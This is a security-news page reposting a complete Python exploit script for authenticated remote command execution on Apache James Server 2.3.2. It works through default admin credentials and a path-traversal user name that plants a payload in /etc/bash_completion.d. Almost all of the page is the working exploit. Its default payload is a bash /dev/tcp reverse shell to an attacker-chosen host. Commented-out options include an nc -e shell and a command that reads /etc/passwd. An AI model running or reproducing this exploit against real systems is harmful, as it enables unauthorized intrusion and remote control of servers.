HackDig : Dig high-quality web security articles

Apache James Server 2.3.2 Remote Command Execution

2021-09-28 19:45
# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)# Date: 27/09/2021# Exploit Author: shinris3n# Vendor Homepage: http://james.apache.org/server/# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip# Version: Apache James Server 2.3.2# Tested on: Ubuntu# Info: This exploit works on default installation of Apache James Server 2.3.2# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d'''This Python 3 implementation is based on the original (Python 2) exploit code developed by Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec.  The following modifications were made:1 - Made required changes to print and socket commands for Python 3 compatibility.1 - Changed the default payload to a basic bash reverse shell script and added a netcat option.2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2.3 - Added a payload that can be used for testing remote command execution and connectivity.4 - Added payload and listener information output based on payload selection and user input.5 - Added execution output clarifications and additional informational comments throughout the code.@shinris3nhttps://twitter.com/shinris3nhttps://shinris3n.github.io/'''#!/usr/bin/python3import socketimport sysimport time# credentials to James Remote Administration Tool (Default - root/root)user = 'root'pwd = 'root'if len(sys.argv) != 4:    sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>n" % sys.argv[0])    sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443n" % sys.argv[0])    sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.n")    sys.exit(1)remote_ip = sys.argv[1]local_ip = sys.argv[2]port = sys.argv[3]# Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH)payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login#payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell#payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login onlyprint ("[+]Payload Selected (see script for more options): ", payload)if '/bin/bash' in payload:    print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port)def recv(s):        s.recv(1024)        time.sleep(0.2)try:    print ("[+]Connecting to James Remote Administration Tool...")    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)    s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary.    s.recv(1024)    s.send((user + "n").encode('utf-8'))    s.recv(1024)    s.send((pwd + "n").encode('utf-8'))    s.recv(1024)    print ("[+]Creating user...")    s.send("adduser ../../../../../../../../etc/bash_completion.d exploitn".encode('utf-8'))    s.recv(1024)    s.send("quitn".encode('utf-8'))    s.close()    print ("[+]Connecting to James SMTP server...")    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)    s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary.    s.send("ehlo team@team.plrn".encode('utf-8'))    recv(s)    print ("[+]Sending payload...")    s.send("mail from: <'@team.pl>rn".encode('utf-8'))    recv(s)    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>rn".encode('utf-8')) if the recipient cannot be found    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>rn".encode('utf-8'))    recv(s)    s.send("datarn".encode('utf-8'))    recv(s)    s.send("From: team@team.plrn".encode('utf-8'))    s.send("rn".encode('utf-8'))    s.send("'n".encode('utf-8'))    s.send((payload + "n").encode('utf-8'))    s.send("rn.rn".encode('utf-8'))    recv(s)    s.send("quitrn".encode('utf-8'))    recv(s)    s.close()    print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).")    if '/bin/bash' in payload:        print ("[+]Don't forget to start a listener on port", port, "before logging in!")except:    print ("Connection failed.")            


Source: 2410901202-BLW/eussi/moc.ytirucesxc

Read:1274 | Comments:0 | Tags:No Tag

“Apache James Server 2.3.2 Remote Command Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)
Tell me why you support me <3